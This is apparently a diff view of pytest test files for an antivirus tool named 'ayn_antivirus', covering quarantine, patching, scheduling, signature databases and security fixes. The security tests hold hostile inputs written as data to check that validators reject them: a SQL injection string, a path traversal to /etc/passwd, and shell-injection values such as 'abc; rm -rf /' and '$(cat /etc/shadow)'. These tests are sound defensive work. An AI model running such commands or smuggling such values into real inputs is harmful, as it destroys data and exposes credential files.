monitor.start(paths=[str(tmp_path)])
assert monitor.is_running is True
monitor.start(paths=[str(tmp_path)]) # Should log warning, not crash
assert monitor.is_running is True
monitor.stop()
def test_monitor_stop_when_not_running(monitor):
"""Stopping when not running should be harmless."""
assert monitor.is_running is False
monitor.stop()
assert monitor.is_running is False
def test_monitor_nonexistent_path(monitor):
"""Non-existent paths should be skipped without crash."""
monitor.start(paths=["/nonexistent/path/xyz123"])
# Should still be running (observer started, just no schedules)
assert monitor.is_running is True
monitor.stop()

View File

@@ -0,0 +1,139 @@
"""Tests for auto-patcher."""
import pytest
import os
import stat
from ayn_antivirus.remediation.patcher import AutoPatcher, RemediationAction
def test_patcher_init():
p = AutoPatcher(dry_run=True)
assert p.dry_run is True
assert p.actions == []
def test_patcher_init_live():
p = AutoPatcher(dry_run=False)
assert p.dry_run is False
def test_fix_permissions_dry_run(tmp_path):
f = tmp_path / "test.sh"
f.write_text("#!/bin/bash")
f.chmod(0o4755) # SUID
p = AutoPatcher(dry_run=True)
action = p.fix_permissions(str(f))
assert action is not None
assert action.success is True
assert action.dry_run is True
# In dry run, file should still have SUID
assert f.stat().st_mode & stat.S_ISUID
def test_fix_permissions_real(tmp_path):
f = tmp_path / "test.sh"
f.write_text("#!/bin/bash")
f.chmod(0o4755) # SUID
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
# SUID should be stripped
assert not (f.stat().st_mode & stat.S_ISUID)
def test_fix_permissions_already_safe(tmp_path):
f = tmp_path / "safe.txt"
f.write_text("hello")
f.chmod(0o644)
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
assert "already safe" in action.details
def test_fix_permissions_sgid(tmp_path):
f = tmp_path / "sgid.sh"
f.write_text("#!/bin/bash")
f.chmod(0o2755) # SGID
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
assert not (f.stat().st_mode & stat.S_ISGID)
def test_fix_permissions_world_writable(tmp_path):
f = tmp_path / "ww.txt"
f.write_text("data")
f.chmod(0o777) # World-writable
p = AutoPatcher(dry_run=False)
action = p.fix_permissions(str(f))
assert action.success is True
assert not (f.stat().st_mode & stat.S_IWOTH)
def test_block_domain_dry_run():
p = AutoPatcher(dry_run=True)
action = p.block_domain("evil.example.com")
assert action is not None
assert action.success is True
assert action.dry_run is True
assert "evil.example.com" in action.target
def test_block_ip_dry_run():
p = AutoPatcher(dry_run=True)
action = p.block_ip("1.2.3.4")
assert action.success is True
assert action.dry_run is True
assert "1.2.3.4" in action.target
def test_remediate_threat_dry_run(tmp_path):
# Create a dummy file
f = tmp_path / "malware.bin"
f.write_text("evil_payload")
f.chmod(0o4755)
p = AutoPatcher(dry_run=True)
threat = {
"path": str(f),
"threat_name": "Test.Malware",
"threat_type": "MALWARE",
"severity": "HIGH",
}
actions = p.remediate_threat(threat)
assert isinstance(actions, list)
assert len(actions) >= 1
# Should have at least a fix_permissions action
action_names = [a.action for a in actions]
assert "fix_permissions" in action_names
def test_remediate_threat_miner_with_domain():
p = AutoPatcher(dry_run=True)
threat = {
"threat_type": "MINER",
"domain": "pool.evil.com",
"ip": "1.2.3.4",
}
actions = p.remediate_threat(threat)
action_names = [a.action for a in actions]
assert "block_domain" in action_names
assert "block_ip" in action_names
def test_remediation_action_dataclass():
a = RemediationAction(
action="test_action", target="/tmp/test", details="testing",
success=True, dry_run=True,
)
assert a.action == "test_action"
assert a.target == "/tmp/test"
assert a.success is True
assert a.dry_run is True
def test_fix_ld_preload_missing():
"""ld.so.preload doesn't exist — should succeed gracefully."""
p = AutoPatcher(dry_run=True)
action = p.fix_ld_preload()
assert action.success is True

View File

@@ -0,0 +1,50 @@
import os
import pytest
from ayn_antivirus.quarantine.vault import QuarantineVault
def test_quarantine_and_restore(tmp_path):
vault_dir = tmp_path / "vault"
key_file = tmp_path / "keys" / "vault.key"
vault = QuarantineVault(str(vault_dir), str(key_file))
test_file = tmp_path / "malware.txt"
test_file.write_text("this is malicious content")
threat_info = {
"threat_name": "TestVirus",
"threat_type": "virus",
"severity": "high"
}
qid = vault.quarantine_file(str(test_file), threat_info)
assert qid is not None
assert not test_file.exists()
assert vault.count() == 1
restore_path = tmp_path / "restored.txt"
vault.restore_file(qid, str(restore_path))
assert restore_path.exists()
assert restore_path.read_text() == "this is malicious content"
def test_quarantine_list(tmp_path):
vault_dir = tmp_path / "vault"
key_file = tmp_path / "keys" / "vault.key"
vault = QuarantineVault(str(vault_dir), str(key_file))
test_file = tmp_path / "test.txt"
test_file.write_text("content")
vault.quarantine_file(str(test_file), {"threat_name": "Test", "threat_type": "virus", "severity": "low"})
items = vault.list_quarantined()
assert len(items) == 1
def test_quarantine_delete(tmp_path):
vault_dir = tmp_path / "vault"
key_file = tmp_path / "keys" / "vault.key"
vault = QuarantineVault(str(vault_dir), str(key_file))
test_file = tmp_path / "test.txt"
test_file.write_text("content")
qid = vault.quarantine_file(str(test_file), {"threat_name": "Test", "threat_type": "virus", "severity": "low"})
assert vault.delete_file(qid) == True
assert vault.count() == 0

View File

@@ -0,0 +1,54 @@
import json
import pytest
from datetime import datetime
from ayn_antivirus.core.engine import ScanResult, ScanType, ThreatInfo, ThreatType, Severity
from ayn_antivirus.reports.generator import ReportGenerator
def _make_scan_result():
return ScanResult(
scan_id="test-001",
start_time=datetime.now(),
end_time=datetime.now(),
files_scanned=500,
files_skipped=10,
threats=[
ThreatInfo(
path="/tmp/evil.sh",
threat_name="ReverseShell",
threat_type=ThreatType.MALWARE,
severity=Severity.CRITICAL,
detector_name="heuristic",
details="Reverse shell detected",
file_hash="abc123"
)
],
scan_path="/tmp",
scan_type=ScanType.FULL
)
def test_text_report():
gen = ReportGenerator()
result = _make_scan_result()
text = gen.generate_text(result)
assert "AYN ANTIVIRUS" in text
assert "ReverseShell" in text
def test_json_report():
gen = ReportGenerator()
result = _make_scan_result()
j = gen.generate_json(result)
data = json.loads(j)
assert data["summary"]["total_threats"] == 1
def test_html_report():
gen = ReportGenerator()
result = _make_scan_result()
html = gen.generate_html(result)
assert "<html" in html
assert "ReverseShell" in html
assert "CRITICAL" in html
def test_save_report(tmp_path):
gen = ReportGenerator()
gen.save_report("test content", str(tmp_path / "report.txt"))
assert (tmp_path / "report.txt").read_text() == "test content"

View File

@@ -0,0 +1,72 @@
"""Tests for scheduler."""
import pytest
from ayn_antivirus.core.scheduler import Scheduler, _cron_to_schedule, _parse_cron_field
from ayn_antivirus.config import Config
def test_scheduler_init():
config = Config()
s = Scheduler(config)
assert s is not None
assert s.config is config
def test_cron_parse_simple():
"""Standard daily-at-midnight expression."""
result = _cron_to_schedule("0 0 * * *")
assert result["minutes"] == [0]
assert result["hours"] == [0]
def test_cron_parse_step():
"""Every-5-minutes expression."""
result = _cron_to_schedule("*/5 * * * *")
assert 0 in result["minutes"]
assert 5 in result["minutes"]
assert 55 in result["minutes"]
assert len(result["minutes"]) == 12
def test_cron_parse_range():
"""Specific range of hours."""
result = _cron_to_schedule("30 9-17 * * *")
assert result["minutes"] == [30]
assert result["hours"] == list(range(9, 18))
def test_cron_parse_invalid():
"""Invalid cron expression raises ValueError."""
with pytest.raises(ValueError, match="5-field"):
_cron_to_schedule("bad input")
def test_schedule_scan():
config = Config()
s = Scheduler(config)
# Scheduling should not crash
s.schedule_scan("0 0 * * *", "full")
s.schedule_scan("30 2 * * *", "quick")
# Jobs should have been registered
jobs = s._scheduler.get_jobs()
assert len(jobs) >= 2
def test_schedule_update():
config = Config()
s = Scheduler(config)
s.schedule_update(interval_hours=6)
jobs = s._scheduler.get_jobs()
assert len(jobs) >= 1
def test_parse_cron_field_literal():
assert _parse_cron_field("5", 0, 59) == [5]
def test_parse_cron_field_comma():
assert _parse_cron_field("1,3,5", 0, 59) == [1, 3, 5]
def test_parse_cron_field_wildcard():
result = _parse_cron_field("*", 0, 6)
assert result == [0, 1, 2, 3, 4, 5, 6]

View File

@@ -0,0 +1,197 @@
"""Security tests — validate fixes for audit findings."""
import os
import tempfile
import pytest
# -----------------------------------------------------------------------
# Fix 2: SQL injection in ioc_db._count()
# -----------------------------------------------------------------------
class TestIOCTableWhitelist:
@pytest.fixture(autouse=True)
def setup_db(self, tmp_path):
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
self.db = IOCDatabase(tmp_path / "test_ioc.db")
self.db.initialize()
yield
self.db.close()
def test_valid_tables(self):
for table in ("ioc_ips", "ioc_domains", "ioc_urls"):
assert self.db._count(table) >= 0
def test_injection_blocked(self):
with pytest.raises(ValueError, match="Invalid table"):
self.db._count("ioc_ips; DROP TABLE ioc_ips; --")
def test_arbitrary_table_blocked(self):
with pytest.raises(ValueError, match="Invalid table"):
self.db._count("evil_table")
def test_valid_tables_frozenset(self):
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
assert isinstance(IOCDatabase._VALID_TABLES, frozenset)
assert IOCDatabase._VALID_TABLES == {"ioc_ips", "ioc_domains", "ioc_urls"}
# -----------------------------------------------------------------------
# Fix 4: Quarantine ID path traversal
# -----------------------------------------------------------------------
class TestQuarantineIDValidation:
@pytest.fixture(autouse=True)
def setup_vault(self, tmp_path):
from ayn_antivirus.quarantine.vault import QuarantineVault
self.vault = QuarantineVault(
tmp_path / "vault", tmp_path / "vault" / ".key"
)
def test_traversal_blocked(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("../../etc/passwd")
def test_too_short(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("abc")
def test_too_long(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("a" * 33)
def test_non_hex(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG")
def test_uppercase_hex_rejected(self):
with pytest.raises(ValueError, match="Invalid quarantine ID"):
self.vault._validate_qid("A" * 32)
def test_valid_id(self):
assert self.vault._validate_qid("a" * 32) == "a" * 32
assert self.vault._validate_qid("0123456789abcdef" * 2) == "0123456789abcdef" * 2
def test_whitespace_stripped(self):
padded = " " + "a" * 32 + " "
assert self.vault._validate_qid(padded) == "a" * 32
# -----------------------------------------------------------------------
# Fix 3: Quarantine restore path traversal
# -----------------------------------------------------------------------
class TestRestorePathValidation:
@pytest.fixture(autouse=True)
def setup_vault(self, tmp_path):
from ayn_antivirus.quarantine.vault import QuarantineVault
self.vault = QuarantineVault(
tmp_path / "vault", tmp_path / "vault" / ".key"
)
def test_etc_blocked(self):
with pytest.raises(ValueError, match="protected path"):
self.vault._validate_restore_path("/etc/shadow")
def test_usr_bin_blocked(self):
with pytest.raises(ValueError, match="protected path"):
self.vault._validate_restore_path("/usr/bin/evil")
def test_cron_blocked(self):
with pytest.raises(ValueError, match="Refusing to restore"):
self.vault._validate_restore_path("/etc/cron.d/backdoor")
def test_systemd_blocked(self):
with pytest.raises(ValueError, match="Refusing to restore"):
self.vault._validate_restore_path("/etc/systemd/system/evil.service")
def test_safe_path_allowed(self):
result = self.vault._validate_restore_path("/tmp/restored.txt")
assert result.name == "restored.txt"
# -----------------------------------------------------------------------
# Fix 5: Container scanner command injection
# -----------------------------------------------------------------------
class TestContainerIDSanitization:
@pytest.fixture(autouse=True)
def setup_scanner(self):
from ayn_antivirus.scanners.container_scanner import ContainerScanner
self.scanner = ContainerScanner()
def test_semicolon_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("abc; rm -rf /")
def test_dollar_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("$(cat /etc/shadow)")
def test_backtick_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("`whoami`")
def test_pipe_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("abc|cat /etc/passwd")
def test_ampersand_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("abc && echo pwned")
def test_empty_rejected(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("")
def test_too_long_rejected(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("a" * 200)
def test_valid_ids(self):
assert self.scanner._sanitize_id("abc123") == "abc123"
assert self.scanner._sanitize_id("my-container") == "my-container"
assert self.scanner._sanitize_id("web_app.v2") == "web_app.v2"
assert self.scanner._sanitize_id("a1b2c3d4e5f6") == "a1b2c3d4e5f6"
# -----------------------------------------------------------------------
# Fix 6: Config key validation
# -----------------------------------------------------------------------
def test_config_key_whitelist_in_cli():
"""The config --set handler should reject unknown keys.
We verify by inspecting the CLI module source for the VALID_CONFIG_KEYS
set and its guard clause, since it's defined inside a Click command body.
"""
import inspect
import ayn_antivirus.cli as cli_mod
src = inspect.getsource(cli_mod)
assert "VALID_CONFIG_KEYS" in src
assert '"scan_paths"' in src
assert '"dashboard_port"' in src
# Verify the guard clause exists
assert "if key not in VALID_CONFIG_KEYS" in src
# -----------------------------------------------------------------------
# Fix 9: API query param validation
# -----------------------------------------------------------------------
def test_safe_int_helper():
from ayn_antivirus.dashboard.api import _safe_int
assert _safe_int("50", 10) == 50
assert _safe_int("abc", 10) == 10
assert _safe_int("", 10) == 10
assert _safe_int(None, 10) == 10
assert _safe_int("-5", 10, min_val=1) == 1
assert _safe_int("9999", 10, max_val=500) == 500
assert _safe_int("0", 10, min_val=1) == 1

View File

@@ -0,0 +1,53 @@
import os
import tempfile
import pytest
from ayn_antivirus.signatures.db.hash_db import HashDatabase
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
def test_hash_db_create(tmp_path):
db = HashDatabase(str(tmp_path / "test.db"))
db.initialize()
assert db.count() == 0
db.close()
def test_hash_db_add_and_lookup(tmp_path):
db = HashDatabase(str(tmp_path / "test.db"))
db.initialize()
db.add_hash("abc123hash", "TestMalware", "virus", "high", "test")
result = db.lookup("abc123hash")
assert result is not None
assert result["threat_name"] == "TestMalware"
db.close()
def test_hash_db_bulk_add(tmp_path):
db = HashDatabase(str(tmp_path / "test.db"))
db.initialize()
records = [
("hash1", "Malware1", "virus", "high", "test", ""),
("hash2", "Malware2", "malware", "medium", "test", ""),
("hash3", "Miner1", "miner", "high", "test", ""),
]
count = db.bulk_add(records)
assert count == 3
assert db.count() == 3
db.close()
def test_ioc_db_ips(tmp_path):
db = IOCDatabase(str(tmp_path / "test.db"))
db.initialize()
db.add_ip("1.2.3.4", "BotnetC2", "c2", "feodo")
result = db.lookup_ip("1.2.3.4")
assert result is not None
ips = db.get_all_malicious_ips()
assert "1.2.3.4" in ips
db.close()
def test_ioc_db_domains(tmp_path):
db = IOCDatabase(str(tmp_path / "test.db"))
db.initialize()
db.add_domain("evil.com", "Phishing", "phishing", "threatfox")
result = db.lookup_domain("evil.com")
assert result is not None
domains = db.get_all_malicious_domains()
assert "evil.com" in domains
db.close()

View File

@@ -0,0 +1,49 @@
import os
import tempfile
import pytest
from ayn_antivirus.utils.helpers import (
format_size, format_duration, is_root, validate_ip,
validate_domain, generate_id, hash_file, safe_path
)
def test_format_size():
assert format_size(0) == "0.0 B"
assert format_size(1024) == "1.0 KB"
assert format_size(1048576) == "1.0 MB"
assert format_size(1073741824) == "1.0 GB"
def test_format_duration():
assert "0s" in format_duration(0) or "0" in format_duration(0)
result = format_duration(3661)
assert "1h" in result
assert "1m" in result
def test_validate_ip():
assert validate_ip("192.168.1.1") == True
assert validate_ip("10.0.0.1") == True
assert validate_ip("999.999.999.999") == False
assert validate_ip("not-an-ip") == False
assert validate_ip("") == False
def test_validate_domain():
assert validate_domain("example.com") == True
assert validate_domain("sub.example.com") == True
assert validate_domain("") == False
def test_generate_id():
id1 = generate_id()
id2 = generate_id()
assert isinstance(id1, str)
assert len(id1) == 32
assert id1 != id2
def test_hash_file(tmp_path):
f = tmp_path / "test.txt"
f.write_text("hello world")
h = hash_file(str(f))
assert isinstance(h, str)
assert len(h) == 64 # sha256 hex
def test_safe_path(tmp_path):
result = safe_path(str(tmp_path))
assert result is not None